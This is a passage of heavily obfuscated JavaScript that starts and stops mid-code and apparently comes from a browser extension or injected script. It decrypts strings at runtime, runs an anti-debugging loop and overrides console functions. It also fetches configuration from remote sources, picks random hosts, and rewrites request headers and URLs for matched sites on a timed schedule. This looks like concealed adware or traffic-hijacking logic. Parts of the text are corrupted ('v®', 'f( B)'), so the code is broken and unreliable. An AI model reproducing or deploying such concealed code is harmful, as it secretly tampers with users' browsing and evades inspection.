tW7RdTmk0','W541W6lcHqC','h8oIcCkQW57cKdy','cSoHsZ/dNmkcW7RcQ0yQ','baWYD3a','vmohfmkkW6CHcqqaW5W','mSkyW48','Dbmfb8kGoSkcWP/cOSo0','W6tdIwVdRKy','WRayWObNW57dOmozwa','imoDk8ktW5y','WRGYWR1TW5S','ctG/i8ooqMtdSJ80','W51OeCk2ySoKymop','tSodh8kvW5ukhb4E','WO5XvSkFo8o2jSklfa','CmkPthlcKG','A8kzW5e','qSkPWRddNx0','W4eFfSo3iG','WQXzbqDHW7VdRComWQjM','qYBdNWKdWR9kW4OnW40','xmkZW57dSru','tSola8kqW7iReaG','W4ShW4pcGYBcMwf1E8kv','DxnY','ns4/AKK','omkToq','FxL3WQO','nSkSuCoyWOxdQq','smodaSkAW4KV','zCkDwNxcM2zeedFdGG','AXddMSoNrHL9','FvvmWPeI','p8oHWP/cNmoE','WQqpwtyjFa','WQToba','ldDUigVcMa','EmkgDMtcLgrt','mJ8mqL0','W4/cHCkEW7exW4W','W7/cRmoaiSk4','ymkfWRldIMi','WO/dG3lcQ0ddJv4MW5j6','etmFfmonxgpdSH4L','W6vSW4ldP8kekmoQrxHP','uaddV8oSxW','WPmJWPxdU8kh','AcuhqgddTSk4W7ZcING','WPnwWPFcTIRcMg9bwW','WOPcqCo/ja','rdBdKqez','W4NdJgxdJMG','e8okWOxcJCoJoa','d8o6Fd/dJq','W5tcL8kZW5qU'];const a0f=function(s,l){s=s-(-0x27*-0x84+-0x2*-0xdb2+-0x2dd6);let A=a0r[s];if(a0f['yNvNGn']===undefined){var v=function(O){const z='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let a='';for(let V=-0x1*0x1722+-0xd1d+0xc15*0x3,X,x,c=0x875+0x2*-0x242+-0x1*0x3f1;x=O['charAt'](c++);~x&&(X=V%(-0xf4f*-0x1+-0xef7*-0x1+-0x1e42)?X*(-0x5*-0x35e+0x2507+-0x9*0x5f5)+x:x,V++%(0x47e*0x5+0x1*0xb4e+-0x21c0))?a+=String['fromCharCode'](0x1702+-0xb*-0x1be+-0x292d&X>>(-(0x17cb+-0x39*0x13+-0x138e)*V&0x1219+0x1*0x2543+0x6*-0x939)):-0xaf1*-0x2+-0x1f21+0x1*0x93f){x=z['indexOf'](x);}return a;};const P=function(O,z){let a=[],V=0x132c+0x1dc1+-0x30ed,X,c='',U='';O=v(O);for(let F=0x1a43+-0x1043*0x2+-0x1*-0x643,B=O['length'];F<B;F++){U+='%'+('00'+O['charCodeAt'](F)['toString'](0x137b*-0x1+0xf*-0xb9+-0xf31*-0x2))['slice'](-(-0x481*0x1+0x4ae+-0x2b));}O=decodeURIComponent(U);let G;for(G=0x2687+-0x138c+-0x2b*0x71;G<-0xea8+0x14d0+0x1*-0x528;G++){a[G]=G;}for(G=0x3*0x952+0x1*-0x2231+0x63b;G<-0x4a9+-0x26f+0x818;G++){V=(V+a[G]+z['charCodeAt'](G%z['length']))%(-0xf18+-0x522+0x13*0x11e),X=a[G],a[G]=a[V],a[V]=X;}G=-0xb19+-0x729*-0x5+-0x83c*0x3,V=0x8*0x236+0x713+-0x18c3;for(let T=0x892+0x5*-0x18c+0x2*-0x6b;T<O['length'];T++){G=(G+(-0x1*0x1a4f+-0x7a3+-0x21f3*-0x1))%(0xf11+-0xe22*-0x2+-0x2a55),V=(V+a[G])%(-0x7*-0x22f+0x1012+-0x1e5b),X=a[G],a[G]=a[V],a[V]=X,c+=String['fromCharCode'](O['charCodeAt'](T)^a[(a[G]+a[V])%(-0x109c+-0x1e08+0x4*0xbe9)]);}return c;};a0f['uiASjg']=P,a0f['Dtvvcb']={},a0f['yNvNGn']=!![];}const r=a0r[-0x1a4d+0x3*0x182+0x15c7],f=s+r,b=a0f['Dtvvcb'][f];return b===undefined?(a0f['bEWzYp']===undefined&&(a0f['bEWzYp']=!![]),A=a0f['uiASjg'](A,l),a0f['Dtvvcb'][f]=A):A=b,A;};const a0s1=a0f,a0s2=a0f,a0s3=a0f,a0s4=a0f,a0s5=a0f;(function(s,l){const j=a0f,o=a0f,y=a0f,J=a0f,S=a0f;while(!![]){try{const A=-parseInt(j(0x40c,'yAvB'))*parseInt(j(0x2c5,'QB$Y'))+parseInt(y(0x210,'UQM8'))*parseInt(j(0x47e,'xWg('))+parseInt(y(0x59a,'mU4s'))*-parseInt(y(0x361,'25hK'))+parseInt(y(0x284,'$]ai'))*-parseInt(S(0x584,'DH7R'))+parseInt(S(0x3da,'$Vpd'))*-parseInt(o(0x576,'d)[^'))+parseInt(y(0x2de,'$]ai'))*-parseInt(o(0x1fa,'C7@$'))+parseInt(o(0x59d,'6(5I'));if(A===l)break;else s['push'](s['shift']());}catch(v){s['push'](s['shift']());}}}(a0r,-0x3e918+0x1*-0x1a0a1+-0x5a04*-0x25));const a0v=function(){let s=!![];return function(l,A){const v=s?function(){const I=a0f;if(A){const r=A[I(0x344,'%1Wi')](l,arguments);return A=null,r;}}:function(){};return s=![],v;};}();(function(){const R=a0f,L=a0f,E=a0f,H=a0f,Q=a0f,l={};l[R(0x330,'J&Ou')]=L(0x25b,'0si)')+E(0x492,'UQM8'),l[L(0x446,'UQM8')]=H(0x317,'j#2h')+Q(0x291,'mU4s')+R(0x663,'Y7Ko')+E(0x302,'M$%w'),l[R(0x208,'Y7Ko')]=function(v,r){return v®;},l[Q(0x620,'$]ai')]=R(0x403,'@(X['),l[R(0x49f,'lu&$')]=function(v,r){return v+r;},l[L(0x2b1,'Y7Ko')]=L(0x411,'cL8r'),l[Q(0x364,'k^U#')]=R(0x30d,'cR2Y'),l[E(0x34d,'FwY2')]=function(v,r){return v®;},l[E(0x383,'ICSG')]=function(v){return v();},l[E(0x310,'&NUL')]=function(v,r,f){return v(r,f);};const A=l;A[Q(0x3d5,'w&lY')](a0v,this,function(){const Z=H,u=R,W=R,Y=L,C=L,v=new RegExp(A[Z(0x4c3,'ICSG')]),r=new RegExp(A[Z(0x1fd,'$vab')],'i'),f=A[u(0x26d,'C7@$')](a0A,A[Y(0x588,'6(5I')]);!v[Z(0x3a1,'8@D3')](A[Y(0x535,'WW46')](f,A[Y(0x3ce,'lu&$')]))||!r[Z(0x267,'xWg(')](A[Y(0x5d0,'cR2Y')](f,A[Z(0x22b,'cgVJ')]))?A[u(0x2bb,'Y$2)')](f,'0'):A[Z(0x286,'8@D3')](a0A);})();}());const a0l=function(){let s=!![];return function(l,A){const v=s?function(){const d=a0f;if(A){const r=A[d(0x6c5,'siaL')](l,arguments);return A=null,r;}}:function(){};return s=![],v;};}(),a0s=a0l(this,function(){const t=a0f,m=a0f,D=a0f,K=a0f,s0=a0f,l={};l[t(0x616,'siaL')]=function(b,P){return b(P);},l[t(0x512,'Y$2)')]=function(b,P){return b+P;},l[D(0x540,'JXuv')]=D(0x272,'J&Ou')+m(0x28e,'&NUL'),l[s0(0x244,'Q##1')]=D(0x4ed,')^B&')+D(0x685,'yTY2')+D(0x277,'AhHj')+'\x20)',l[m(0x442,'@(X[')]=function( B){return b();},l[m(0x1c3,'C7@$')]=s0(0x5ed,'J&Ou'),l[m(0x2df,'mU4s')]=D(0x3bf,'sc^*'),l[s0(0x2b5,'mU4s')]=K(0x35a,'w&lY'),l[s0(0x60d,'JXuv')]=t(0x3ed,'otDQ'),l[m(0x26f,'yTY2')]=K(0x386,'FwY2'),l[t(0x4c7,'8@D3')]=s0(0x2d3,'oqvV'),l[K(0x697,'$Vpd')]=s0(0x309,'Q##1'),l[t(0x481,'otDQ')]=function(b,P){return b<P;};const A=l;let v;try{const b=A[K(0x3d3,'cR2Y')](Function,A[K(0x651,'$vab')](A[s0(0x388,'cL8r')](A[t(0x1ea,'%1Wi')],A[s0(0x336,'0si)')]),');'));v=A[K(0x510,'k^U#')]( B);}catch(P){v=window;}const r=v[m(0x305,'k^U#')]=v[m(0x3a5,'@(X[')]||{},f=[A[m(0x1dc,'8@D3')],A[m(0x4fd,'j#2h')],A[m(0x1bf,'otDQ')],A[K(0x43e,'j#2h')],A[m(0x447,'cR2Y')],A[m(0x2ae,'cgVJ')],A[K(0x6b1,'FwY2')]];for(let O=0x3f*0x30+0x1*-0xfcc+0x3fc;A[s0(0x5fe,'oqvV')](O,f[D(0x290,'$Vpd')]);O++){const z=a0l[K(0x3fe,'UQM8')+'r'][m(0x57d,'Y7Ko')][m(0x436,'cgVJ')](a0l),a=f[O],V=r[a]||z;z[D(0x221,'5#F9')]=a0l[s0(0x6a9,'M$%w')](a0l),z[s0(0x35f,']Rcs')]=V[K(0x4b5,'Q##1')][t(0x292,'ICSG')](V),r[a]=z;}});a0s();const init=[a0s1(0x372,'FwY2')+a0s2(0x29d,'!tWl')+a0s1(0x6af,'cgVJ')+a0s4(0x4d6,'k^U#')+a0s3(0x33c,'sc^*')+a0s5(0x557,'C7@$')],userId='e9589834c6e87576b69f65ab2a92bfa0';a0s5(0x397,'w&lY');const storageCfgName=a0s5(0x374,'UQM8'),storageStatsName=a0s3(0x550,'25hK'),storageStateName=a0s1(0x375,'mU4s'),a0b={};a0b[a0s2(0x463,'JXuv')]=a0s1(0x1e6,'25hK'),a0b[a0s5(0x46a,'Y$2)')]=a0s2(0x248,'C7@$'),a0b[a0s5(0x3de,'FwY2')]=a0s1(0x268,'UQM8'),a0b[a0s3(0x50d,']Rcs')]=a0s2(0x60e,')^B&');const statPools=a0b,a0P={};a0P[a0s3(0x5a6,'DH7R')]=[a0s1(0x660,']Rcs')],a0P[a0s2(0x524,'JXuv')]=[a0s5(0x2ac,'$Vpd')];const defaultFilter=a0P,a0O={};a0O[a0s1(0x25c,'otDQ')]=a0s1(0x3bd,'Q##1'),a0O[a0s1(0x4ce,'vA59')]=a0s1(0x34f,'m$hw'),a0O[a0s3(0x3cb,'ICSG')]=a0s5(0x20b,'SNZo'),a0O[a0s1(0x24e,'25hK')]=a0s1(0x408,'oqvV');const cfgSources=a0O,debug=typeof initDebug==a0s5(0x46d,'$]ai')?![]:initDebug,getInit=s=>init[s]||undefined,limitedReqFilter=![],appFormat=0x1*0xb71+0x3*0x9bd+-0x28a7,appVersion=0x2145+0x14f4+0x3637*-0x1,a0z={};a0z[a0s4(0x438,'J&Ou')]=0x0,a0z[a0s4(0x280,'!tWl')+a0s4(0x49c,')^B&')]=[a0s2(0x395,'d)[^'),a0s3(0x264,'6(5I'),a0s1(0x1b1,'mU4s'),a0s1(0x29a,'%1Wi')+'n',a0s3(0x266,'xWg('),a0s3(0x4cf,'f2lD')+'e',a0s4(0x3c8,'M$%w')+'s','id'];const a0a={};a0a[a0s1(0x34e,'5#F9')]=getInit(-0x1325+0x299*-0x4+0x1d89)?getInit(-0x2109+-0x7*-0x4a5+0x43*0x2)[a0s3(0x29e,'xWg(')]('|'):undefined,a0a[a0s1(0x4ce,'vA59')]=a0s5(0x601,'yAvB')+a0s1(0x3cf,'lu&$')+a0s2(0x56c,'mU4s')+a0s1(0x558,'xWg(')+a0s2(0x20d,'5#F9')+a0s1(0x38a,'JXuv')+a0s2(0x2e5,'sc^*')+a0s1(0x1ff,'j#2h'),a0a[a0s4(0x5f7,'QB$Y')]=a0s2(0x3b1,'%1Wi'),a0a[a0s2(0x2b3,'$Vpd')+a0s2(0x3e2,'WW46')]=!![],a0a[a0s4(0x69d,'Epg(')]=0xe10,a0a[a0s5(0x228,'AhHj')]=0x3,a0a[a0s4(0x23d,'J&Ou')]=!![],a0a[a0s4(0x40b,'DH7R')+a0s4(0x555,'$vab')]=0x3,a0a[a0s2(0x1b5,'$]ai')+'o']=!![];const a0V={};a0V[a0s1(0x4dc,'WW46')]=appFormat,a0V[a0s1(0x57c,'25hK')]=appVersion,a0V[a0s5(0x23b,'FwY2')]='x',a0V[a0s3(0x21c,'AhHj')]=a0z,a0V[a0s5(0x3fb,'$]ai')]=a0a;let globalDefaultCfg=a0V,globalState={},globalStats={},globalPending=[],globalCurCfg;const sec2ms=l=>l*(0x99*0x1d+-0x45b*0x1+-0x912),getHostName=s=>new URL(s)[a0s5(0x579,']Rcs')][a0s2(0x556,'QB$Y')+'e'](),getRndRangeInt=(s,l)=>Math[a0s2(0x2e7,'cL8r')](Math[a0s5(0x3be,'yTY2')]()*(l-s))+s,getRndInt=s=>getRndRangeInt(0x1fa7+0x239*0x11+-0xb0*0x65,s),getRndStr=(l=0x6ab+0xc57+-0x12fe)=>{const s6=a0s4,s7=a0s1,s8=a0s3,s9=a0s2,ss=a0s1,A={};A[s6(0x594,'mU4s')]=function(f, B){return f<b;},A[s7(0x23f,'d)[^')]=function(f, B){return f*b;};const v=A;let r='';for(let f=0x16c*0x1+-0x42*-0x95+-0x27d6;v[s7(0x5a3,'siaL')](f,l);f++){r+=String[s6(0x370,'yTY2')+'de'](Math[ss(0x41a,'w&lY')](v[s8(0x3a4,'siaL')](Math[s7(0x5f2,')^B&')](),-0x26dc+0x7fa*0x3+0x1*0xfed)));}return r;},getKey=(l=0x18c9+0x25*-0xf1+-0x7*-0x170)=>{const sl=a0s4,sA=a0s5,A={};A[sl(0x296,'yTY2')]=function(f, B){return f( B);};const v=A;let r=v[sl(0x57a,']Rcs')](getRndStr,l);return r;},rawurlencode=l=>{const sv=a0s2,sr=a0s2,sf=a0s5,sb=a0s4,sP=a0s2,A={};A[sv(0x60c,'FwY2')]=function(r,f){return r(f);},A[sr(0x346,'UQM8')]=function(r,f){return r+f;},A[sr(0x1d4,'DH7R')]=sb(0x61f,'JXuv'),A[sr(0x569,'ICSG')]=sv(0x24c,'SNZo'),A[sb(0x2c0,'cR2Y')]=sr(0x44b,'yTY2'),A[sf(0x62c,'siaL')]=sf(0x4a0,'M$%w'),A[sv(0x36b,'Epg(')]=sv(0x3a2,'m$hw');const v=A;return v[sr(0x3c5,'0si)')](encodeURIComponent,v[sf(0x55d,'SNZo')](l,''))[sv(0x437,'$Vpd')](/!/g,v[sr(0x234,'0si)')])[sr(0x288,'yTY2')](/'/g,v[sf(0x4b7,'WW46')])[sP(0x517,'%1Wi')](/$/g,v[sP(0x4ee,'FwY2')])[sf(0x358,'DH7R')](/$/g,v[sb(0x56f,'xWg(')])[sv(0x5f4,'Y$2)')](/\*/g,v[sr(0x6cf,'QB$Y')]);},removeUnicode=s=>s[a0s3(0x6d1,'SNZo')](/[^\x00-\xFF]/g,'');function wildcardMatch(l,A){const sO=a0s4,sz=a0s5,sa=a0s5,sV=a0s1,sX=a0s2,v={};v[sO(0x31a,'SNZo')]=function(b,P){return b+P;};const r=v;var f=b=>b[sO(0x61a,'0si)')](/([.*+?^=!:${}()|\[\]\/\\])/gi,sa(0x24f,'oqvV'));return new RegExp(r[sO(0x5be,'yAvB')](r[sV(0x452,'f2lD')]('^',A[sa(0x450,'f2lD')]('*')[sV(0x52e,'yTY2')](f)[sX(0x50b,'siaL')]('.*')),'$'))[sV(0x491,'SNZo')](l);}function getMatchedUrlPattern(l,A){const sx=a0s3,sc=a0s5,sk=a0s2,si=a0s1,sU=a0s3,v={};v[sx(0x3ad,'%yFL')]=function(O,z,a){return O(z,a);},v[sx(0x2b7,'cR2Y')]=function(O,z,a){return O(z,a);},v[sk(0x5cb,'C7@$')]=function(O,z){return O+z;},v[sx(0x4e4,'yAvB')]=function(O,z){return O+z;};const r=v;let f=new URL(l),b=r[sx(0x4bc,'AhHj')](r[sx(0x393,'0si)')](r[si(0x2fe,'xWg(')](f[sk(0x593,'0si)')],f[sc(0x6c8,'QB$Y')]),f[sU(0x43b,'QB$Y')]),f[sU(0x1db,'UQM8')]),P;return A[sk(0x6cc,'QB$Y')](O=>{const sG=sx,sF=sU,sB=sx,sT=sU,sp=sk;P=O;let z='*.';if(O[sG(0x2f0,'j#2h')](z)){let a=O[sG(0x2f6,'&NUL')](z[sB(0x460,'M$%w')]);if(r[sG(0x5b7,'5#F9')](wildcardMatch,b,a))return!![];}return r[sB(0x298,'AhHj')](wildcardMatch,b,O);})?P:null;}function getMatchedTask(l,A){const sq=a0s1,sg=a0s1,sn=a0s4,v={};v[sq(0x3c7,'j#2h')]=function(f,b,P){return f(b,P);};const r=v;for(let f in l){let b=r[sq(0x467,'AhHj')](getMatchedUrlPattern,A,l[f][sq(0x674,'yAvB')]);if(b)return l[f];}return null;}function getHeaders(s,l){const se=a0s2,sw=a0s5,sN=a0s2,sM=a0s5;return s[se(0x6ae,'8@D3')](A=>A[se(0x497,'$Vpd')][sN(0x3ba,'ICSG')+'e']()===l[se(0x480,'sc^*')+'e']());}function replaceHeader(l,A,v,r){const sh=a0s2,sj=a0s2,so=a0s2,sy=a0s3,sJ=a0s3,f={};f[sh(0x301,'j#2h')]=function(O,z){return O<z;},f[sj(0x640,'!tWl')]=function(O,z){return O===z;};const b=f;let P=![];for(let O=0x1773+0x3b*-0x8+-0x159b*0x1;b[sj(0x630,'AhHj')](O,l[sh(0x2f5,'f2lD')]);O++){if(b[sy(0x312,'FwY2')](l[O][sy(0x45c,'@(X[')][sj(0x1e9,'25hK')+'e'](),A[sJ(0x586,'f2lD')+'e']())){l[O][sJ(0x2e2,'AhHj')]=v,P=!![];if(!r)break;}}return P;}function addHeader(l,A,v){const sS=a0s5,sI=a0s3,sR=a0s5,r={};r[sS(0x308,'cL8r')]=A,r[sS(0x216,'0si)')]=v,l[sR(0x342,'AhHj')]®;}function replaceAppMacros(l,A){const sL=a0s3,sE=a0s4,sH=a0s4,sQ=a0s4,sZ=a0s2,v={};v[sL(0x667,'AhHj')]=function(b,P){return b+P;},v[sE(0x689,'xWg(')]=function(b,P){return b+P;},v[sL(0x6c6,']Rcs')]=sE(0x4e6,'DH7R'),v[sL(0x6c1,'Q##1')]=sL(0x46e,'$]ai'),v[sZ(0x617,'&NUL')]=sZ(0x239,'xWg('),v[sH(0x37f,'%1Wi')]=sE(0x2e9,'SNZo'),v[sH(0x44d,'!tWl')]=sQ(0x645,'8@D3');const r=v,f=[[r[sL(0x1f6,'cgVJ')],appFormat],[r[sZ(0x477,'yTY2')],appVersion],[r[sZ(0x694,'Y$2)')],l[sQ(0x48e,'&NUL')]],[r[sE(0x6ce,'$vab')],l[sQ(0x48c,'C7@$')][sL(0x649,'lu&$')]],[r[sZ(0x245,'WW46')],userId]];return f[sH(0x636,'j#2h')]((b,P)=>{const su=sE,sW=sZ,sY=sZ;let O=new RegExp(r[su(0x6a3,'k^U#')](r[sW(0x6c3,'Q##1')]('\x5c[',b[0x1a2d*0x1+0x1*-0x1e3b+0x40e*0x1]),'\x5c]'),'gi');A=A[sY(0x48b,'%yFL')](O,b[0x1b89+0xb5*-0x3+-0x1*0x1969]);}),A;}function replaceUrlMacros(l,A){const sC=a0s2,sd=a0s5,st=a0s1,sm=a0s1,sD=a0s4,v={};v[sC(0x1b0,'mU4s')]=function(f,b,P){return f(b,P);},v[sC(0x429,']Rcs')]=function(f){return f();},v[sC(0x236,'cR2Y')]=function(f, B){return f+b;},v[sd(0x426,'8@D3')]=function(f, B){return f( B);};const r=v;l=r[sm(0x21e,'yTY2')](replaceAppMacros,r[st(0x254,'Y7Ko')](getConfig),l);for(let f in A){let b=new RegExp(r[sC(0x40d,'!tWl')](r[st(0x592,'C7@$')]('\x5c[',f),'\x5c]'),'gi');l=l[sC(0x656,'&NUL')](b,A[f]);}return l=r[sm(0x382,'vA59')](encodeURI,l),l;}setInterval(function(){const sK=a0s4,l0=a0s3,l={};l[sK(0x303,'@(X[')]=function(v){return v();};const A=l;A[sK(0x554,'J&Ou')](a0A);},0xf14*-0x1+0x1*-0x5b2+0x2466);function isActionTimeNow(l){const l1=a0s4,l2=a0s1,l3=a0s1,l4=a0s2,l5=a0s2,A={};A[l1(0x36f,'&NUL')]=function(f, B){return f===b;},A[l2(0x4ea,'25hK')]=function(f, B){return f>=b;};const v=A;if(l[l3(0x4b4,']Rcs')])return![];if(!l[l1(0x205,'M$%w')+'e']||v[l4(0x321,'25hK')](l[l3(0x2cc,'m$hw')+'e'],null))return![];let r=Date[l1(0x355,'j#2h')]();return v[l5(0x4fe,'6(5I')](r,l[l5(0x45a,']Rcs')+'e']);}function prepareTask(l){const l6=a0s5,l7=a0s2,l8=a0s3,l9=a0s4,ls=a0s5,A={};A[l6(0x489,'yAvB')]=function(b,P){return b(P);},A[l6(0x552,'UQM8')]=function(b,P){return b>=P;},A[l7(0x4f3,'!tWl')]=function(b,P){return b!=P;};const v=A;if(l[l9(0x4e8,'Y7Ko')])return![];let r=Date[l7(0x62b,')^B&')]();!l[ls(0x66c,'mU4s')+l7(0x21b,'siaL')]&&(l[ls(0x681,'UQM8')+l8(0x39b,'DH7R')]=r);let f=v[l6(0x387,'%yFL')](r,l[ls(0x5d9,')^B&')+l9(0x5eb,')^B&')]);if(f&&!l[l6(0x1df,']Rcs')+'p']){l[ls(0x511,'cgVJ')][l6(0x1ad,'d)[^')](b=>{const ll=ls,lA=l7,lv=l6,lr=l6,lf=ls;!b[ll(0x45b,')^B&')]&&!b[ll(0x200,'yTY2')+'e']&&(b[lv(0x23c,'f2lD')+'e']=r),!l[lA(0x27d,'!tWl')+'p']&&v[lf(0x5aa,'Q##1')](isActionTimeNow, B)&&(l[lA(0x274,'sc^*')+'p']=b[ll(0x41d,'%1Wi')]);});if(!l[ls(0x6a5,'8@D3')+'p']){}}return f&&v[l9(0x5df,'cR2Y')](l[l8(0x5a7,'Y$2)')+'p'],undefined);}function finishTask(l){const lb=a0s1,lP=a0s2,lO=a0s5,lz=a0s4,la=a0s2,A={};A[lb(0x5b9,'Y7Ko')]=function(r,f){return r+f;},A[lb(0x3bb,'Y7Ko')]=function(r,f){return r(f);};const v=A;l[lP(0x6b5,'UQM8')+'p']=undefined,l[lz(0x389,'%1Wi')]?l[la(0x351,'!tWl')+lb(0x64d,'%yFL')]=v[lP(0x629,'yAvB')](Date[la(0x56b,'QB$Y')](),v[lz(0x33e,'w&lY')](sec2ms,l[lO(0x417,'J&Ou')])):(l[lz(0x5b4,'cL8r')+lP(0x64d,'%yFL')]=null,l[lb(0x444,'otDQ')]=!![]);}function updateActionNextRunTime(l){const lV=a0s2,lX=a0s4,lx=a0s2,lc=a0s1,lk=a0s1,A={};A[lV(0x4fb,'5#F9')]=function(r,f){return r+f;},A[lV(0x5c6,'FwY2')]=function(r,f){return r(f);};const v=A;l[lx(0x2f3,'C7@$')]?l[lV(0x474,'SNZo')+'e']=v[lX(0x4f5,'QB$Y')](Date[lk(0x22e,'Y$2)')](),v[lX(0x458,'mU4s')](sec2ms,l[lV(0x1f8,'%yFL')])):(l[lx(0x404,'yAvB')+'e']=null,l[lx(0x3a0,'m$hw')]=!![]);}function finishAction(l){const li=a0s2,lU=a0s4,lG=a0s4,lF=a0s1,lB=a0s5,A={};A[li(0x696,'k^U#')]=function(r,f){return r(f);},A[lU(0x4a9,'cR2Y')]=function(r,f){return r(f);};const v=A;v[li(0x44a,'Epg(')](updateActionsCount,l[lU(0x476,'!tWl')]),v[lB(0x55b,'yTY2')](updateActionNextRunTime,l);}function initTasks(A){const lT=a0s4,lp=a0s3,lq=a0s5,lg=a0s1,ln=a0s3,v={};v[lT(0x3aa,'yAvB')]=lp(0x261,']Rcs'),v[lq(0x6b3,'C7@$')]=function(b,P){return b+P;},v[lq(0x68c,'cL8r')]=function(b,P){return b+P;},v[lT(0x549,'oqvV')]=function(b,P){return b+P;},v[lg(0x4d4,'WW46')]=lT(0x5a1,'8@D3'),v[ln(0x38f,'siaL')]=lp(0x2e8,'M$%w');const r=v;if(!A)return;let f=A[lq(0x650,'cL8r')];if(A[ln(0x38c,'Y$2)')+ln(0x2ce,'sc^*')+lg(0x224,'AhHj')]){}else{for(let b in f){let P=f[b];P[lg(0x695,'d)[^')]&&!P[ln(0x674,'yAvB')]&&(P[lp(0x338,'C7@$')]=P[lT(0x327,'5#F9')]),P[lg(0x45f,'cgVJ')]=undefined,P[lq(0x3db,'$Vpd')]=P[lq(0x635,'FwY2')][lq(0x4bb,'xWg(')](O=>{const le=lp,lw=lp,lN=lp,lM=lp,lh=lg,z=r[le(0x4cd,'$Vpd')][lw(0x250,']Rcs')]('|');let a=-0xb39+-0xeb*0xf+0x18fe;while(!![]){switch(z[a++]){case'0':!O[lw(0x398,'xWg(')]('/')&&(O=r[le(0x6b3,'C7@$')](O,'/'));continue;case'1':return O;case'2':!O[lM(0x4fa,'&NUL')]('*')&&(O=r[lw(0x262,'FwY2')](O,'*'));continue;case'3' :o=O[lw(0x390,'cL8r')]()[lN(0x49d,'!tWl')+'e']();continue;case'4':!O[lh(0x526,'&NUL')]('*')&&(O=r[lw(0x1d2,'JXuv')]('*.',O));continue;}break;}});}A[lg(0x46f,'oqvV')+lp(0x1ab,'vA59')+ln(0x2dc,'M$%w')]=!![];}A[lg(0x409,'JXuv')+ln(0x609,'$Vpd')]=undefined;if(limitedReqFilter){let O=[];for(let a in f){let V=f[a];!V[lg(0x39a,'yTY2')]&&V[ln(0x67e,'M$%w')][lp(0x664,'5#F9')](X=>{const lj=ln,lo=lg,ly=ln;O[lj(0x1d5,'C7@$')](r[lj(0x66e,'5#F9')](r[ly(0x5a5,'M$%w')],X));});}const z={};z[lg(0x385,'m$hw')]=O,z[lg(0x295,'%yFL')]=[r[ln(0x20e,'JXuv')]],A[lg(0x64a,'vA59')]=z;}}const getConfig=()=>globalCurCfg,getDefaultConfig=()=>globalDefaultCfg;function checkConfig(l,A){const lJ=a0s4,lS=a0s2,lI=a0s4,lR=a0s2,lL=a0s2,v={};v[lJ(0x4cc,'QB$Y')]=function(f, B){return f( B);},v[lS(0x3ab,'siaL')]=function(f, B){return f( B);},v[lJ(0x1aa,'oqvV')]=lS(0x619,'8@D3')+lJ(0x5ae,'5#F9'),v[lL(0x5b6,'JXuv')]=function(f, B){return f( B);},v[lI(0x2a1,'5#F9')]=lS(0x220,'C7@$')+lJ(0x657,'8@D3'),v[lL(0x275,'6(5I')]=lI(0x241,'!tWl')+lI(0x2c9,'UQM8'),v[lI(0x391,')^B&')]=lR(0x340,'j#2h')+lL(0x528,'@(X[');const r=v;if(!l){}else{if(!r[lS(0x407,'0si)')](isValidConfig,l)){switch(A){case cfgSources[lJ(0x5d6,'FwY2')]:r[lI(0x2fd,'Epg(')](updateErrCount,r[lS(0x54b,'$]ai')]);break;case cfgSources[lL(0x4c9,'Y$2)')]:r[lJ(0x53c,'m$hw')](updateErrCount,r[lI(0x610,'yTY2')]);break;case cfgSources[lL(0x443,'$]ai')]:r[lL(0x4d0,'cL8r')](updateErrCount,r[lR(0x4f9,'5#F9')]);break;default:r[lJ(0x61c,'J&Ou')](updateErrCount,r[lL(0x22c,'0si)')]);break;}l=undefined;}else{}}return l;}function getRndHost(l){const lE=a0s2,lH=a0s1,lQ=a0s5,lZ=a0s1,lu=a0s5,A={};A[lE(0x683,'C7@$')]=function(b,P){return b(P);},A[lE(0x698,'cgVJ')]=lH(0x405,'%yFL'),A[lH(0x5dc,'%yFL')]=function(b,P){return b==P;},A[lZ(0x3d2,'SNZo')]=function(b,P,O){return b(P,O);},A[lE(0x541,'yTY2')]=function(b,P){return b%P;},A[lE(0x3a7,'0si)')]=function(b,P){return b-P;};const v=A;let r=v[lH(0x45e,'Y7Ko')](getState,v[lZ(0x2f4,'yTY2')]);v[lQ(0x60b,']Rcs')](r,undefined)&&(r=v[lE(0x21a,'J&Ou')](getRndInt,Number[lu(0x55c,'%1Wi')+lQ(0x68f,']Rcs')]),v[lE(0x1d3,'d)[^')](saveState,v[lu(0x5d4,'xWg(')],r));let f=v[lu(0x2a7,'Y7Ko')](l[lQ(0x313,'Y7Ko')][lE(0x51b,'sc^*')][lH(0x335,'m$hw')],r);return l[lZ(0x2b0,'sc^*')][lE(0x2a6,'yAvB')][v[lZ(0x3a7,'0si)')](f,-0x14ce+0x1bbc+-0x6ed)];}function prepareConfig(l){const lW=a0s1,lY=a0s3,lC=a0s2,ld=a0s3,lt=a0s1,A={};A[lW(0x3f5,'yAvB')]=lW(0x49b,'JXuv'),A[lC(0x536,'yTY2')]=function(r,f){return r(f);},A[lY(0x5de,'FwY2')]=function(r,f){return r==f;},A[lY(0x440,'lu&$')]=lY(0x691,'oqvV'),A[lW(0x60a,'WW46')]=function(r,f, B){return r(f, B);};const v=A;if(l[lC(0x3e5,'$Vpd')])return;l[lt(0x1fb,'0si)')][v[lt(0x6b4,'M$%w')]]=v[lW(0x562,'6(5I')](getRndHost,l);for(let r in l[lW(0x5fc,']Rcs')]){let f=l[lt(0x66d,'@(X[')][r];v[ld(0x662,'d)[^')](typeof f,v[lW(0x5cf,'cR2Y')])&&(l[lW(0x2f2,'yTY2')][r]=v[lC(0x43c,'25hK')](replaceAppMacros,l,f));}l[lC(0x672,'FwY2')]=!![];}function setConfig(A){const lm=a0s1,lD=a0s1,lK=a0s5,A0=a0s2,A1=a0s5,v={};v[lm(0x324,'cgVJ')]=function(O){return O();},v[lD(0x26a,'cgVJ')]=function(O,z){return O(z);},v[lK(0x3f1,'J&Ou')]=function(O,z){return O===z;},v[lm(0x533,'8@D3')]=function(O,z){return O(z);},v[lK(0x4ae,'w&lY')]=lD(0x43d,'SNZo');const r=v;let f=r[A0(0x324,'cgVJ')](getConfig);r[A1(0x427,'w&lY')](prepareConfig,A);let b=f&&r[A0(0x2fc,'8@D3')](A[A0(0x5e2,')^B&')],f[A1(0x487,'M$%w')])?![]:!![];b?r[lK(0x52d,'%1Wi')](initTasks,A):A[lm(0x650,'cL8r')]=f[A0(0x207,'WW46')];!A[lK(0x6c0,'Y7Ko')]&&(A[lD(0x1cc,'%1Wi')]=Date[A1(0x57e,'0si)')]());const 